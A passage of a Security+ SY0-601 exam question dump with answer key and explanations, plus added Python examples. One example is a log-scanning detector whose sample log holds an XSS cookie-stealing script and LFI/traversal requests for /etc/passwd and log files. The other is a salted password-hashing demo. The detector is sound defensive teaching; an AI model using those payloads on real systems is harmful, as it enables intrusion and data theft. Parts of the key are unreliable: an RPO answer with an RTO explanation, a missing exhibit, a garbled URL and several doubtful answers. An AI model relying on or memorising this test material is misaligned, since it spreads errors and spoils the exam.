passing a server-side path in a page or template parameter. LFI can expose sensitive files such as
/etc/passwd or application configuration, and in severe cases it leads to remote code execution,
for instance by including a log file into which the attacker has written PHP code. LFI falls under
the injection category of the OWASP Top 10.
Directory traversal - Sequences such as ../../ in a parameter escape the intended directory and
let the attacker read files elsewhere on the file system; it is the mechanism through which LFI
usually reaches files outside the web root.
RFI - Remote File Inclusion targets applications that dynamically include scripts from a URL. The
attacker supplies a URL on a domain they control so that the server fetches and executes their
code (for example a backdoor shell). Nothing in this scenario points to a remote URL, so RFI is
not one of the two answers.
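Detection logic for both the reflected XSS payload of Question 747 and the LFI and directory traversal patterns of Question 755, as an added example that is not part of the original exam guide. The access log lines and the regular expressions are constructed here; a production detector would use a maintained rule set.

```python
# Added example (not from the exam guide): classifying suspicious requests
# from web server access logs, covering the reflected-XSS payload seen in
# Question 747 and the LFI / directory traversal patterns of Question 755.
# The log lines are constructed for illustration (Apache combined-log style).
import re
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2023:10:01:02 +0000] "GET /contactus/?name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 512
10.0.0.7 - - [10/Mar/2023:10:01:09 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1834
10.0.0.7 - - [10/Mar/2023:10:01:15 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1" 200 99012
10.0.0.9 - - [10/Mar/2023:10:02:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)')

# Patterns are applied to the fully URL-decoded query so that %3C and %2e%2e
# encodings do not evade them; decoding is repeated to catch double encoding.
XSS_RE = re.compile(r'<\s*script|javascript:|on\w+\s*=', re.I)
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
LFI_TARGETS = re.compile(r'/etc/passwd|/etc/shadow|/proc/self|\.log\b|php://', re.I)

def fully_decode(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s

def classify(url):
    """Return the set of technique labels found in one request URL."""
    query = fully_decode(urlsplit(url).query)
    labels = set()
    if XSS_RE.search(query):
        labels.add("XSS")
    if TRAVERSAL_RE.search(query):
        labels.add("directory traversal")
    if LFI_TARGETS.search(query):
        labels.add("LFI")
    return labels

def scan_log(text):
    """Return (ip, url, labels) for each log line with at least one finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        labels = classify(m["url"])
        if labels:
            hits.append((m["ip"], m["url"], labels))
    return hits

if __name__ == "__main__":
    for ip, url, labels in scan_log(SAMPLE_LOG):
        print(ip, sorted(labels), url)
```

Decoding before matching is the important part: the third constructed line carries the same traversal as the second but percent-encoded, and a rule that looked for a literal `../` in the raw log would miss it.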
QUESTION 756
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon
reviewing the document’s contents, the author notices some additional verbiage that was not
originally in the document but cannot validate an integrity issue. Which of the following attacks
was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
Answer: C
Explanation:
A digital signature is computed over the hash of the document, not over the document itself. In a
collision attack the attacker prepares two different documents that produce the same hash value,
so the signature made for the original verifies equally for the substituted version. The signature
check still passes, which is why the author cannot demonstrate an integrity problem even though
the content has changed. This is why MD5 and SHA-1, for which practical collisions have been
demonstrated, must not be used for signing.
QUESTION 757
During a recent security assessment, a vulnerability was found in a common OS, The OS vendor
was unaware of the issue and promised to release a patch within next quarter. Which of the
following BEST describes this type of vulnerability?
A. Legacy operating system
B. Weak configuration
C. Zero day
D. Supply chain
Answer: C
Explanation:
A zero-day vulnerability is one the vendor was unaware of and for which no patch exists yet;
"the OS vendor was unaware of the issue" is the defining clue.
QUESTION 758
A network engineer created two subnets that will be used for production and development
servers. Per security policy, production and development servers must each have a dedicated
network that cannot communicate with one another directly.
Which of the following should be deployed so that server administrators can access these
devices?
A. VLANs
B. Internet proxy servers
C. NIDS
D. Jump servers
Answer: D
Explanation:
A jump server (jump host or jump box) is a hardened and monitored system used to access and
manage devices in a separate security zone. It sits between dissimilar security zones and
provides a controlled, logged means of reaching each of them, so administrators can manage
both the production and the development subnets while the two subnets themselves remain
unable to talk to each other directly.
QUESTION 759
The Chief Information Security Officer (CISO) of a bank recently updated the incident response
policy. The CISO is concerned that members of the incident response team do not understand
their roles. The bank wants to test the policy but with the least amount of resources or impact.
Which of the following BEST meets the requirements?
A. Warm site failover
B. Tabletop walk-through
C. Parallel path testing
D. Full outage simulation
Answer: B
Explanation:
Tabletop exercises:
- Performing a full-scale disaster drill can be costly and time consuming.
- Many of the logistics can be determined through analysis; you don't physically have to go
through a disaster or drill.
- Get the key players together and talk through a simulated disaster, which is exactly what is
needed to check that team members understand their roles.
QUESTION 760
A company has a flat network in the cloud. The company needs to implement a solution to
segment its production and non-production servers without migrating servers to a new network.
Which of the following solutions should the company implement?
A. Internet
B. Screened subnet
C. VLAN segmentation
D. Zero Trust
Answer: C
Explanation:
A flat network connects all devices to a single broadcast domain to reduce cost, maintenance,
and administration, which means production and non-production servers can reach each other
freely. VLAN segmentation splits that single network into separate logical segments and applies
access control between them, without re-addressing or migrating the servers to a new network.
QUESTION 761
A security analyst is tasked with defining the "something you are" factor of the company's MFA
settings. Which of the following is BEST to use to complete the configuration?
A. Gait analysis
B. Vein
C. Soft token
D. HMAC-based, one-time password
Answer: B
Explanation:
Vein pattern recognition is a physiological biometric, which is "something you are". Gait analysis
is a behavioral biometric ("something you do"), and a soft token or HOTP code is "something you
have".
QUESTION 762
A news article states hackers have been selling access to IoT camera feeds.
Which of the following is the Most likely reason for this issue?
A. Outdated software
B. Weak credentials
C. Lack of encryption
D. Backdoors
Answer: B
Explanation:
Many IoT devices ship with the same default password from the manufacturer, and owners rarely
change it. Weak or default credentials are the most common way attackers take over IoT
cameras, and the resulting feeds can then be sold.
QUESTION 763
Which of the following prevents an employee from seeing a colleague who is visiting an
inappropriate website?
A. Job rotation policy
B. NDA
C. AUP
D. Separation of duties policy
Answer: C
Explanation:
An acceptable use policy (AUP) defines what employees may and may not do with company
systems, including which categories of websites may be visited. It is enforced with web filtering
software that blocks high-risk or inappropriate sites on managed computers, and monitoring of
employee computer use provides tangible insight into how effective the policy is.
QUESTION 764
Which of the following techniques eliminates the use of rainbow tables for password cracking?
A. Hashing
B. Tokenization
C. Asymmetric encryption
D. Salting
Answer: D
Explanation:
A rainbow table is a precomputed mapping from candidate passwords to their hash values for
one specific hash function. A salt is a random value stored alongside the hash and mixed into the
password before hashing, so two users with the same password get different hashes and an
attacker would need a separate table for every salt value, which makes precomputation useless.
Hashing alone (A) is exactly what rainbow tables are built to reverse.
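Salted password hashing as recommended in Questions 739 and 764, as an added example that is not part of the original exam guide. It uses PBKDF2-HMAC-SHA256 from the Python standard library; the iteration count, the stored record format, and the sample passwords are choices made here for illustration.

```python
# Added example (not from the exam guide): storing passwords as salted
# hashes, as recommended in Questions 739 and 764. It uses PBKDF2-HMAC-SHA256
# from the standard library; the iteration count, the record format and the
# sample passwords are choices made here for illustration.
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # OWASP's current recommendation for PBKDF2-HMAC-SHA256
SALT_BYTES = 16

def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record 'pbkdf2_sha256$iters$salt$hash'.
    A fresh random salt is drawn for every call unless one is supplied."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(("pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(),
                     base64.b64encode(digest).decode()))

def verify_password(password, record):
    """Recompute the hash with the stored salt and compare in constant time."""
    algorithm, iters, salt_b64, hash_b64 = record.split("$")
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    return hmac.compare_digest(candidate, expected)

def unsalted_hash(password):
    """What a rainbow table targets: the same password always yields the
    same digest, so one precomputed table cracks every user at once."""
    return hashlib.sha256(password.encode()).hexdigest()

def demo():
    """Two users choose the same password. Unsalted, their stored hashes are
    identical; salted, they differ, and verification still works."""
    pw = "Winter2023!"   # constructed sample password
    same_unsalted = unsalted_hash(pw) == unsalted_hash(pw)
    rec_a, rec_b = hash_password(pw), hash_password(pw)
    return {
        "unsalted_identical": same_unsalted,
        "salted_identical": rec_a == rec_b,
        "verify_correct": verify_password(pw, rec_a),
        "verify_wrong": verify_password("Winter2023?", rec_a),
    }

if __name__ == "__main__":
    print(demo())
```

Storing the algorithm and iteration count inside each record is what lets the cost be raised later: old records keep verifying with their own parameters and can be re-hashed at the user's next successful login.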
QUESTION 765
A large financial services firm recently released information regarding a security breach within its
corporate network that began several years before. During the time frame in which the breach
occurred, indicators show an attacker gained administrative access to the network through a file
downloaded from a social media site and subsequently installed it without the user's knowledge.
Since the compromise, the attacker was able to take command and control the computer systems
anonymously while obtaining sensitive corporate and personal employee information. Which of
the following methods did the attacker MOST likely use to gain access?
A. A bot
B. A fileless virus
C. A logic bomb
D. A RAT
Answer: D
Explanation:
A remote access trojan (RAT) is malware that is installed covertly, usually bundled inside a
seemingly legitimate download, and lets the attacker remotely control the infected computer.
Once the RAT is running, the attacker can send commands to it and receive data back, which
matches the years-long anonymous command and control and data theft described here.
QUESTION 766
A security analyst is receiving several alerts per user and is trying to determine if various logins
are malicious. The security analyst would like to create a baseline of normal operations and
reduce noise. Which of the following actions should the security analyst perform?
A. Adjust the data flow from authentication sources to the SIEM.
B. Disable email alerting and review the SIEM directly.
C. Adjust the sensitivity levels of the SIEM correlation engine.
D. Utilize behavioral analysis to enable the SIEM's learning mode.
Answer: D
Explanation:
User behavior analytics (UBA) is a threat detection technology that learns how users normally
behave (when, from where, and to what they log in) and then flags activity that deviates from
that baseline. In this scenario the SIEM first learns what normal looks like for each user; once the
baseline exists, only logins that differ from it generate alerts, which reduces the noise of alerting
on every login. Simply lowering sensitivity (C) would reduce alerts but also hide real attacks.
QUESTION 767
Which of the following typically uses a combination of human and artificial intelligence to analyze
event data and take action without intervention?
A. TTP
B. OSINT
C. SOAR
D. SIEM
Answer: C
Explanation:
SOAR (security orchestration, automation, and response) collects data and alerts on a
centralized platform much like a SIEM, but where a SIEM only sends alerts to analysts, SOAR
goes a step further and executes playbooks that respond automatically (isolating a host,
blocking an indicator, opening a ticket). Human analysts write and tune the playbooks, and
machine learning is used to recognize patterns, so the response combines human and artificial
intelligence and runs without manual intervention for each event.
QUESTION 768
While preparing a software inventory report, a security analyst discovers an unauthorized
program installed on most of the company's servers. The program utilizes the same code signing
certificate as an application deployed to only the accounting team.
Which of the following mitigations would BEST secure the server environment?
A. Revoke the code signing certificate used by both programs.
B. Block all unapproved file hashes from installation.
C. Add the accounting application file hash to the allowed list.
D. Update the code signing certificate for the approved application.
Answer: A
Explanation:
An unauthorized program signed with the same code signing certificate as an internal application
indicates that the certificate's private key has been compromised. Revoking the certificate causes
signature checks on the unauthorized program to fail, which stops it from executing on the
servers; the legitimate accounting application then needs to be re-signed with a new certificate.
Blocking hashes (B) only covers the samples already seen, and (C) and (D) leave the compromised
certificate trusted.
QUESTION 769
A security analyst in a SOC has been tasked with onboarding a new network into the SIEM.
Which of the following BEST describes the information that should feed into a SIEM solution in
order to adequately support an investigation?
A. Logs from each device type and security layer to provide correlation of events
B. Only firewall logs since that is where attackers will most likely try to breach the network
C. Email and web-browsing logs because user behavior is often the cause of security breaches
D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from
every device
Answer: A
Explanation:
A SIEM is only as useful as the breadth of data it correlates. An investigation has to follow an
attacker across layers (firewall, authentication, endpoint, application, DNS), so logs from each
device type and security layer are needed; any single source leaves blind spots.
QUESTION 770
Two hospitals merged into a single organization. The privacy officer requested a review of all
records to ensure encryption was used during record storage, in compliance with regulations.
During the review, the officer discovered that medical diagnosis codes and patient names were
left unsecured. Which of the following types of data does this combination BEST represent?
A. Personal health information
B. Personally Identifiable Information
C. Tokenized data
D. Proprietary data
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
271
Answer: A
QUESTION 771
Which of the following is the MOST effective way to detect security flaws present on third-party
libraries embedded on software before it is released into production?
A. Employ different techniques for server- and client-side validations.
B. Use a different version control system for third-party libraries.
C. Implement a vulnerability scan to assess dependencies earlier on SDLC.
D. Increase the number of penetration tests before software release.
Answer: C
Explanation:
Implementing vulnerability scans allows for earlier detection and assessment of any potential
vulnerabilities, which can then be addressed accordingly.
QUESTION 772
A Chief Security Officer is looking for a solution that can reduce the occurrence of customers
receiving errors from back-end infrastructure when systems go offline unexpectedly. The security
architect would like the solution to help maintain session persistence. Which of the following
would BEST meet the requirements?
A. Reverse proxy
B. NIC teaming
C. Load balancer
D. Forward proxy
Answer: C
Explanation:
A load balancer can monitor the back-end servers and direct traffic to working servers when other
servers go offline. It can also maintain session persistence, whereas a reverse proxy does not
manage session persistence.
QUESTION 773
Which of the following is a reason to publish files' hashes?
A. To validate the integrity of the files
B. To verify if the software was digitally signed
C. To use the hash as a software activation key
D. To use the hash as a decryption passphrase
Answer: A
Explanation:
To validate the integrity of the files - A hash function lets you compare the file's original and
current hash values. If even a single byte of the file's data has been changed, the original
and current hash values will differ, so you will know whether it is the same file or
not.
QUESTION 774
A company is moving its retail website to a public cloud provider. The company wants to tokenize
credit card data but not allow the cloud provider to see the stored credit card information. Which
of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Answer: B
Explanation:
CASBs have become a vital part of enterprise security, allowing businesses to safely use the
cloud while protecting sensitive corporate data.
QUESTION 775
A technician was dispatched to complete repairs on a server in a data center. While locating the
server, the technician entered a restricted area without authorization. Which of the following
security controls would BEST prevent this in the future?
A. Use appropriate signage to mark all areas.
B. Utilize cameras monitored by guards.
C. Implement access control vestibules.
D. Enforce escorts to monitor all visitors.
Answer: C
Explanation:
An access control vestibule, or mantrap, is a physical access control system designed to prevent
unauthorized individuals from following authorized individuals into facilities with controlled access.
This question is asking for a way to prevent physical access to a restricted area, and this method
would address this.
QUESTION 776
A user wanted to catch up on some work over the weekend but had issues logging in to the
corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able
to log in successfully. Which of the following BEST describes the policy that is being
implemented?
A. Time-based logins
B. Geofencing
C. Network location
D. Password history
Answer: A
Explanation:
Time-based logins: Time-of-day restrictions are an access control concept that limits when a user
account is able to log into a system or network. This is a tool and technique for limiting access to
sensitive environments to normal business hours, when oversight and monitoring can be
performed to prevent fraud, abuse, or intrusion. Time-of-day restrictions may also force logout of
an account after the authorized time period ends.
QUESTION 777
Several attempts have been made to pick the door lock of a secure facility. As a result, the
security engineer has been assigned to implement a stronger preventative access control. Which
of the following would BEST complete the engineer's assignment?
A. Replacing the traditional key with an RFID key
B. Installing and monitoring a camera facing the door
C. Setting motion-sensing lights to illuminate the door on activity
D. Surrounding the property with fencing and gates
Answer: A
Explanation:
Replacing the traditional key with an RFID key - For this question, there is mention of "attempts
have been made to pick the door lock". Out of the options provided, only the option to replace the
current door key with an RFID key directly addresses this issue. The other options can be viewed
as preventative access control systems/deterrents as well.
Preventative access control - An access control that is used to stop unwanted or unauthorized
activity from occurring; these could be policies, firewalls, physical barriers, etc.
RFID (Radio Frequency Identification) - A type of key card/fob access control system that uses
radio frequency signals to communicate between a reader and an RFID tag. You would place the
tag/card near the reader, and if the reader identifies the signal as belonging to an authorized user,
they will be allowed access.
QUESTION 778
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data
from the company's cloud environment. Which of the following is an immediate consequence of
these integrations?
A. Non-compliance with data sovereignty rules
B. Loss of the vendor's interoperability support
C. Mandatory deployment of a SIEM solution
D. Increase in the attack surface
Answer: D
Explanation:
While non-compliance with data sovereignty rules is an implication of having multiple cloud
providers in DIFFERENT countries, this is not specified in the question. Besides, these are security
solutions, which typically means they will not collect any kind of PII, PHI, or SPI.
QUESTION 779
Security analysts notice a server login from a user who has been on vacation for two weeks. The
analysts confirm that the user did not log in to the system while on vacation. After reviewing
packet capture logs, the analysts notice the following:
Which of the following occurred?
A. A buffer overflow was exploited to gain unauthorized access
B. The user's account was compromised, and an attacker changed the login credentials
C. An attacker used a pass-the-hash attack to gain access
D. An insider threat with username smithJA logged in to the account
Answer: C
QUESTION 780
A company's security team received notice of a critical vulnerability affecting a high-profile device
within the web infrastructure. The vendor patch was just made available online but has not yet
been regression tested in development environments. In the interim, firewall rules were
implemented to reduce the access to the interface affected by the vulnerability. Which of the
following controls does this scenario describe?
A. Deterrent
B. Compensating
C. Detective
D. Preventive
Answer: B
Explanation:
Compensating control looks to be correct here (open to correction, however). A compensating
control, also called an alternative control, is a mechanism that is put in place to satisfy the
requirement for a security measure that is deemed too difficult or impractical to implement at the
present time.
QUESTION 781
After a recent external audit, the compliance team provided a list of several non-compliant, in-scope
hosts that were not encrypting cardholder data at rest. Which of the following compliance
frameworks would address the compliance team's GREATEST concern?
A. PCI DSS
B. GDPR
C. ISO 27001
D. NIST CSF
Answer: A
QUESTION 782
Which of the following is used to ensure that evidence is admissible in legal proceedings when it
is collected and provided to the authorities?
A. Chain of custody
B. Legal hold
C. Event log
D. Artifacts
Answer: A
Explanation:
A chain of custody is a chronological paper trail documenting when, how, and by whom individual
items of physical or electronic evidence - such as cell phone logs - were collected, handled,
analyzed, or otherwise controlled during an investigation.
QUESTION 783
An analyst receives multiple alerts for beaconing activity for a host on the network. After
analyzing the activity, the analyst observes the following:
- A user enters comptia.org into a web browser.
- The website that appears is not the comptia.org site.
- The website is a malicious site from the attacker.
- Users in a different office are not having this issue.
Which of the following types of attacks was observed?
A. On-path attack
B. DNS poisoning
C. Locator (URL) redirection
D. Domain hijacking
Answer: B
Explanation:
Only some clients have this problem of web requests being sent to the malicious site; because users in a different office are unaffected, the cause is a poisoned DNS cache rather than a hijacked domain.
QUESTION 784
A security analyst is tasked with classifying data to be stored on company servers. Which of the
following should be classified as proprietary?
A. Customers' dates of birth
B. Customers' email addresses
C. Marketing strategies
D. Employee salaries
Answer: C
Explanation:
"Proprietary Information" shall mean information (whether now existing or hereafter created or
acquired) developed, created, or discovered by the Company, or which became known by, or was
conveyed to, the Company, which has commercial value in the Company's business.
QUESTION 785
A security engineer is concerned about using an agent on devices that relies completely on
defined known-bad signatures. The security engineer wants to implement a tool with multiple
components including the ability to track, analyze, and monitor devices without reliance on
definitions alone. Which of the following solutions BEST fits this use case?
A. EDR
B. DLP
C. NGFW
D. HIPS
Answer: A
Explanation:
The acronym EDR stands for Endpoint Detection and Response and is also known as EDTR. It is
an endpoint security solution that is responsible for continuous monitoring of endpoints. This
permanent monitoring enables the technology to detect and respond to cyber threats such as
malware or ransomware at an early stage. The basis for this is always the analysis of context-related
information, which can be used to make corrective proposals for recovery.
QUESTION 786
A security architect is required to deploy to conference rooms some workstations that will allow
sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored
in the conference rooms. The fileshare is located in a local data center. Which of the following
should the security architect recommend to BEST meet the requirement?
A. Fog computing and KVMs
B. VDI and thin clients
C. Private cloud and DLP
D. Full drive encryption and thick clients
Answer: B
Explanation:
Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to
provide and manage virtual desktops. VDI hosts desktop environments on a centralized server
and deploys them to end-users on request. VDI can be used to provide the desktop experience.
The computing hardware for VDI can be split into thin clients and thick clients:
- Thin clients are simple computers that are accessed through a remote connection to a
central server, which provides the client all of its resources. Thin clients do not have hard drives,
so data isn't stored locally, and applications would also need to be accessed through a server.
Thin clients would work for this scenario since data can't be stored in the conference rooms and
thin clients can't store data anyway.
- Thick clients are fully functional networked computers that have their own OS and local storage and
handle their own processing. Just think company-provided desktop computers or laptops. They
can connect to a server if needed, but can work independently as well. Since files can be
stored locally on a thick client, they wouldn't meet the requirements of the scenario.
QUESTION 787
Which of the following should an organization consider implementing in the event executives
need to speak to the media after a publicized data breach?
A. Incident response plan
B. Business continuity plan
C. Communication plan
D. Disaster recovery plan
Answer: C
Explanation:
A communication plan is a policy-driven approach to providing company stakeholders with certain
information.
QUESTION 788
An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded
a malicious file that was quarantined by the AV solution. The attacker utilized a local
non-administrative account to restore the malicious file to a new location. The file was then used by
another process to execute a payload. Which of the following attacks did the analyst observe?
A. Privilege escalation
B. Request forgeries
C. Injection
D. Replay attack
Answer: C
Explanation:
An injection attack is any exploitation that allows an attacker to submit code to a target system to
modify its operations and/or poison and corrupt its data set. This is also called a remote code
attack or remote code exploit.
QUESTION 789
The president of a regional bank likes to frequently provide SOC tours to potential investors.
Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?
A. Password complexity
B. Acceptable use
C. Access control
D. Clean desk
Answer: D
Explanation:
A malicious investor would not be able to take advantage of anything gained until after the tour,
whether they swiped a USB drive, or looked at or stole documents. A clean desk policy would
prevent such issues after a tour.
QUESTION 790
A security analyst has been tasked with finding the maximum amount of data loss that can occur
before ongoing business operations would be impacted.
Which of the following terms BEST defines this metric?
A. MTTR
B. RTO
C. RPO
D. MTBF
Answer: C
Explanation:
A recovery time objective (RTO) is the maximum tolerable length of time that a computer, system,
network or application can be down after a failure or disaster occurs. An RTO is measured in
seconds, minutes, hours or days. It is an important consideration in a disaster recovery plan
(DRP).
The amount of time that is used to determine the maximum a company can bear is directly linked
to the application and its impact on the business; any loss of data affects revenue-generating
activities. So, quantifying the impact of such losses will be a key factor in determining how to
configure the environment to achieve the desired RTOs.
QUESTION 791
Which of the following can be used by a monitoring tool to compare values and detect password
leaks without providing the actual credentials?
A. Hashing
B. Tokenization
C. Masking
D. Encryption
Answer: A
Explanation:
Hashing is used to assure the authenticity of websites with which users may share personal and
private information, in password storage applications (personal or used by entities they interact
with online), and is likely used by the antivirus solution they trust to keep their devices free of
malware. So if hashing is used to validate the integrity of data, you can compare hashes to
figure out if the data (a password or whatever it is) was compromised.
https://www.uscybersecurity.net/csmag/what-the-hash-data-integrity-and-authenticity-inamerican-jurisprudence/
QUESTION 792
An annual information security assessment has revealed that several OS-level configurations are
not in compliance due to outdated hardening standards the company is using. Which of the
following would be BEST to use to update and reconfigure the OS-level security configurations?
A. CIS benchmarks
B. GDPR guidance
C. Regional regulations
D. ISO 27001 standards
Answer: A
Explanation:
CIS Benchmarking -> CIS Benchmarks from the Center for Internet Security (CIS) are a set of
globally recognized and consensus-driven best practices to help security practitioners implement
and manage their cybersecurity defenses.
QUESTION 793
A company wants to simplify the certificate management process. The company has a single
domain with several dozen subdomains, all of which are publicly accessible on the internet.
Which of the following BEST describes the type of certificate the company should implement?
A. Subject alternative name
B. Wildcard
C. Self-signed
D. Domain validation
Answer: B
Explanation:
Wildcard SSL certificates are for a single domain and all its subdomains. A subdomain is under
the umbrella of the main domain. Usually subdomains will have an address that begins with
something other than 'www.'
For example, www.cloudflare.com has a number of subdomains, including blog.cloudflare.com,
support.cloudflare.com, and developers.cloudflare.com. Each is a subdomain under the main
cloudflare.com domain.
A single Wildcard SSL certificate can apply to all of these subdomains. Any subdomain will be
listed in the SSL certificate. Users can see a list of subdomains covered by a particular certificate
by clicking on the padlock in the URL bar of their browser, then clicking on "Certificate" (in
Chrome) to view the certificate's details.
https://www.cloudflare.com/learning/ssl/types-of-ssl-certificates/
QUESTION 794
Which of the following BEST describes when an organization utilizes a ready-to-use application
from a cloud provider?
A. IaaS
B. SaaS
C. PaaS
D. XaaS
Answer: B
Explanation:
SaaS, or software as a service, is on-demand access to ready-to-use, cloud-hosted application
software.
https://www.ibm.com/cloud/learn/iaas-paas-saas
QUESTION 795
A security analyst is reviewing web-application logs and finds the following log:
https://www.comptia.org/contact-us/%3Ffile%3D..%2F.A2F.A2Fescgs2Fpasswd
Which of the following attacks is being observed?
A. Directory traversal
B. XSS
C. CSRF
D. On-path attack
Answer: A
Explanation:
A common symptom of this attack is the presence of a variation of the change to parent directory
instruction (i.e., ../) in a URL, such as ..%c0%af or ..%5c.
QUESTION 796
Which of the following describes a social engineering technique that seeks to exploit a person's
sense of urgency?
A. A phishing email stating a cash settlement has been awarded but will expire soon
B. A smishing message stating a package is scheduled for pickup
C. A vishing call that requests a donation be made to a local charity
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime
Answer: A
Explanation:
Phishing: As one of the most popular social engineering attack types, phishing scams are email and text
message campaigns aimed at creating a sense of urgency, curiosity or fear in victims. It then
prods them into revealing sensitive information, clicking on links to malicious websites, or opening
attachments that contain malware.
https://www.imperva.com/learn/application-security/social-engineeringattack/#:~:text=Phishing,curiosity%20or%20fear%20in%20victims.
QUESTION 797
An organization just implemented a new security system. Local laws state that citizens must be
notified prior to encountering the detection mechanism to deter malicious activities. Which of the
following is being implemented?
A. Proximity cards with guards
B. Fence with electricity
C. Drones with alarms
D. Motion sensors with signage
Answer: D
Explanation:
Signage is a deterrent. Motion sensors are detective.
QUESTION 798
Which of the following is a targeted attack aimed at compromising users within a specific industry
or group?
A. Watering hole
B. Typosquatting
C. Hoax
D. Impersonation
Answer: A
Explanation:
A watering hole attack is a targeted attack designed to compromise users within a specific
industry or group of users by infecting websites they typically visit and luring them to a malicious
site.
QUESTION 799
Which of the following documents provides guidance regarding the recommended deployment of
network security systems from the manufacturer?
A. Cloud control matrix
B. Reference architecture
C. NIST RMF
D. CIS Top 20
Answer: C
QUESTION 800
Users are presented with a banner upon each login to a workstation. The banner mentions that
users are not entitled to any reasonable expectation of privacy and access is for authorized
personnel only. In order to proceed past that banner, users must click the OK button. Which of
the following is this an example of?
A. AUP
B. NDA
C. SLA
D. MOU
Answer: A
Explanation:
An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees
must follow in regard to the company's network, software, internet connection and devices.
QUESTION 801
Which of the following is the BEST action to foster a consistent and auditable incident response
process?
A. Incent new hires to constantly update the document with external knowledge.
B. Publish the document in a central repository that is easily accessible to the organization.
C. Restrict eligibility to comment on the process to subject matter experts of each IT silo.
D. Rotate CIRT members to foster a shared responsibility model in the organization.
Answer: D
Explanation:
NIST SP 800-137 under Computer Incident Response Team (CIRT).
QUESTION 802
A user reports falling for a phishing email to an analyst. Which of the following system logs would
the analyst check FIRST?
A. DNS
B. Message gateway
C. Network
D. Authentication
Answer: B
Explanation:
You have to check message gateway to understand the original source of the message as well as
the intended recipients.
QUESTION 803
A penetration tester is fuzzing an application to identify where the EIP of the stack is located on
memory. Which of the following attacks is the penetration tester planning to execute?
A. Race-condition
B. Pass-the-hash
C. Buffer overflow
D. XSS
Answer: C
Explanation:
A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the storage
capacity of the memory buffer. As a result, the program attempting to write the data to the buffer
overwrites adjacent memory locations.
QUESTION 804
A user forwarded a suspicious email to the security team. Upon investigation, a malicious URL
was discovered. Which of the following should be done FIRST to prevent other users from
accessing the malicious URL?
A. Configure the web content filter for the web address.
B. Report the website to threat intelligence partners.
C. Set the SIEM to alert for any activity to the web address.
D. Send out a corporate communication to warn all users of the malicious email.
Answer: A
Explanation:
Web content filtering is the practice of blocking access to web content that may be deemed
offensive, inappropriate, or even dangerous. It is better to block the URL first, since we already
know it's malicious, and notify users later, since you don't know how many other people received the
email.
QUESTION 805
Which of the following in the incident response process is the BEST approach to improve the
speed of the identification phase?
A. Activate verbose logging in all critical assets.
B. Tune monitoring in order to reduce false positive rates.
C. Redirect all events to multiple syslog servers.
D. Increase the number of sensors present on the environment.
Answer: B
Explanation:
In the incident response process, the identification phase is used to recognize whether an event
that occurs should be classified as an incident. Therefore, tuning out false positives would improve
identification speed.
QUESTION 806
An attacker has determined the best way to impact operations is to infiltrate third-party software
vendors. Which of the following vectors is being exploited?
A. Social media
B. Cloud
C. Supply chain
D. Social engineering
Answer: C
Explanation:
Supply chain attacks are an emerging kind of threat that target software developers and
suppliers. The goal is to access source codes, build processes, or update mechanisms by
infecting legitimate apps to distribute malware.
QUESTION 807
Which of the following concepts BEST describes tracking and documenting changes to software
and managing access to files and systems?
A. Version control
B. Continuous monitoring
C. Stored procedures
D. Automation
Answer: A
Explanation:
Version control, also known as source control, is the process of tracking and managing changes
to files over time. VCS -- version control systems -- are software tools designed to help teams
work in parallel.
https://www.perforce.com/blog/vcs/what-is-version-control
QUESTION 808
Which of the following controls is used to make an organization initially aware of a data
compromise?
A. Protective
B. Preventative
C. Corrective
D. Detective
Answer: D
Explanation:
Detective controls identify security events that have already occurred. Intrusion detection
systems are detective controls.
Preventative Controls - act to eliminate or reduce the likelihood that an attack can succeed. A
preventative control operates before an attack can take place. An example is comparing
configurations to a secure baseline to ensure there are no gaps, meaning the organization is pre-emptively
hardening its systems against future attack vectors.
Corrective Controls - controls that remediate security issues that have already occurred.
Restoring backups after a ransomware attack is an example of a corrective control.
QUESTION 809
A vulnerability has been discovered and a known patch to address the vulnerability does not
exist. Which of the following controls works BEST until a proper fix is released?
A. Detective
B. Compensating
C. Deterrent
D. Corrective
Answer: B
Explanation:
It will be necessary to put additional security controls in place until the patch is available; that is what a compensating control does.
QUESTION 810
A company wants to build a new website to sell products online. The website will host a storefront
application that will allow visitors to add products to a shopping cart and pay for the products
using a credit card. Which of the following protocols would be the MOST secure to implement?
A. SSL
B. FTP
C. SNMP
D. TLS
Answer: D
Explanation:
Transport Layer Security (TLS) is the successor protocol to SSL. TLS is an improved version of
SSL. It works in much the same way as SSL, using encryption to protect the transfer of data
